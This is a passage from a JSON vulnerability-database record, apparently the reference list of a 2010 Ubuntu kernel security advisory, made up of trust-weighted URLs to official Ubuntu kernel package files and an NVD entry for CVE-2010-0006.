        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-amd64-k8_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-686_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-firmware-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-304.10_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/hfs-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0006"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/affs-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-generic_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/firewire-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
